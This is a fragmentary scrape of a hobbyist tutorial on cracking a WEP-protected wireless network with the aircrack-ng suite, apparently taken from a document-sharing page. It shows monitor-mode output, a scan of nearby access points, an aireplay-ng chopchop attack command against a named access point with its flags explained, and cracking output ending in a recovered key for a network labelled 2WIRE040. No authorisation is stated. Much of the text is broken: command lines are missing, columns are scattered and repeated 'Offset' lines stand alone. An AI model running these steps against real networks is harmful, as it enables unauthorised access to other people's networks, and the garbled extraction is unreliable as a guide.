Академический Документы
Профессиональный Документы
Культура Документы
Chipset
wlan0
RTL8187
rtl8187 - [phy0]
(monitor mode enabled on mon1)
RTL8187
rtl8187 - [phy0]
mon0
Driver
If you see the monitor mode enabled you know your then good to go.
PWR Beacons
00:24:A5:AD:79:59 -13
00:1C:10:A1:C1:32 -61
00:1B:5B:B3:B5:71 -63
00:18:39:B1:4D:DD -64
00:19:E4:48:97:A9 -63
00:18:39:62:34:EE -63
00:25:3C:F1:C9:E9 -66
00:1A:70:00:77:E4 -64
00:18:3F:2B:A2:01 -67
00:26:50:D0:4D:C9 -69
00:0F:66:D2:6E:F4 -70
00:1D:7E:97:C0:1D -71
00:1E:E5:EB:63:6C -69
00:23:51:3B:89:D1 -71
00:24:B2:51:C6:CA -71
26
3
4
14
11
19
5
13
7
2
5
4
5
3
3
00:48:01
00:48:01
00:48:01
00:48:01
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Was the previous step failboat? If so you might want to use a chopchop attack seen below
aireplay-ng -4 -h 36:b1:e6:05:32 -b 00:19:E4:48:97:A9 mon0
-4 mean the chopchop attack
-h is our hosts mac address in this case 36:b1:e6:05:32
-b is our WAP mac address in this case 00:19:E4:48:97:A9
mon0 is the wireless interface
You should see something similar
.
01:54:33 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:19:E4:48:97:A9
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:19:E4:48:97:A9
0x0000:
0x0010:
0x0020:
0x0030:
0x0040:
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
00:19:E4:48:97:A9 -67 33
8396
2WIRE040
KB depth byte(vote)
0 0/ 2 82(57088) CE(52224) 09(51968) F1(51712) 8A(51200) 3E(50944) 52(50432) 4E(50176)
4F(50176) 93(50176) 35(49920) EE(49920) 13(48896) 14(48896)
1 1/ 3 90(52736) F9(52224) 2E(51200) D5(50944) BA(50688) B9(50432) 51(49920) C1(49920)
48(49664) 35(49408) 12(49152) 9B(49152) F4(48896) 9D(48640)
2 0/ 1 73(60416) 49(54016) 79(52480) 11(52224) 22(52224) 7B(51712) EF(50944) 16(50432)
58(50432) 82(50432) D4(50432) 72(49664) 3A(49408) BA(49152)
3 0/ 6 08(56320) A8(54784) 1C(52992) B3(52736) 10(52224) 8D(51968) D8(50944) 82(50688)
10(50176) 0E(49920) CB(49920) F7(49408) 5F(49152) DA(49152)
4 0/ 3 80(55808) 00(52480) 0B(51456) FC(50944) 95(50432) B7(50432) AE(49920) C0(49408)
E4(49152) 24(48896) 6D(48896) 82(48896) 7F(48640) D4(48640)
KEY FOUND! [ 82:77:73:08:80 ]
Decrypted correctly: 100%
I hope you enjoyed my tutorial.
Securityxxxpert
Note I will be making a video as well to attach with when time permits.